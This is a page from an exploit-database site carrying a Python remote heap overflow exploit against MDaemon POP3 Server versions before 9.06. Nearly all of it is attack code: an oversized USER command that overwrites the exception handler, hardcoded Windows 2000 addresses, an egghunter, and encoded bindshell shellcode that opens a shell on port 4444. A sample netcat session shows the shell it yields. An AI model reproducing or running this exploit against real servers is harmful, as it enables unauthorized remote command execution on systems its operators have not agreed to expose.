0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
============================================================== MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit ============================================================== #!/usr/bin/python import sys import struct import socket from time import sleep ######################################################################################## # MDaemon Pre Authentication (USER) Heap Overflow # Code based on Leon Juranic's exploit # Coded by muts - [email protected] # http://www.hackingdefined.com # http://www.remote-exploit.org # Tested on: # Mdaemon 9.0.5 # Mdaemon 7.2.3 # Mdaemon 7.2.2 # Mdaemon 7.2.1 # Mdaemon 7.2.0 # Possibly Others # PLEASE CONTINUE READING ! # Huge greets to xbxice and talz for leading me away from the darkness ######################################################################################## # Mdaemon is wierd. It seems like their developers decided to annoy everyone # by making their software do unexpected things. # The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter # shellcode - which then scans the memory, and executes a bindshell on port 4444. # # On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214, # for which I unfortunately had no explenation. # I later found out that these machines were fully patched ... # After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to # todays' version, I noticed that the SetunhandledExceptionFilter function had changed, # and looks suspiciously similar to XP SP2... # Note that my unpatched win2k was last patched 2-3 weeks ago, # so I suspect this change is recent. # The end of easy UnhandledExceptionFilter exploitation on Win2k ? # # So, this is a partially working exploit, on unpatched win2k boxes.... # Kiddies, treat this exploit as DOS :) # # I got 3 types of results with this code: # # 1. Shell :) # 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there. # 3. Plain ugly crash - oh well. # # At minimum, I'de check the UnhandledExceptionFilter address before running the exploit. ######################################################################################## # # C:\Documents and Settings\muts>nc -v 192.168.220.128 4444 # 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:\MDaemon\APP> ######################################################################################## host="192.168.220.128" ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage # skape's egghunter shellcode egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23" egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f" egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8" egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3" # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!) shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57" shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48" shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48" shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c" shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38" shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54" shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38" shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d" shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38" shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46" shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57" shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e" shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50" shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34" shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51" shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51" shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42" shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d" shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d" shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56" shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45" shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46" shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c" shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c" shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42" shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f" shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56" shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56" shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f" shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" shellcode +="\x4f\x4f\x42\x4d\x5a" buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346 for x in range(5): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') s.send('QUIT\r\n') s.close() sleep(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER ' + '@A@A'+ buffer + '\r\n') data=s.recv(1024) print data s.send('USER ' + 'A' * 3370 + '\r\n') s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER ' + '@A@A'+ buffer + '\r\n') data=s.recv(1024) print data s.send('USER ' + 'A' * 3370 + '\r\n') s.close() sleep(1) # 0day.today [2024-06-30] #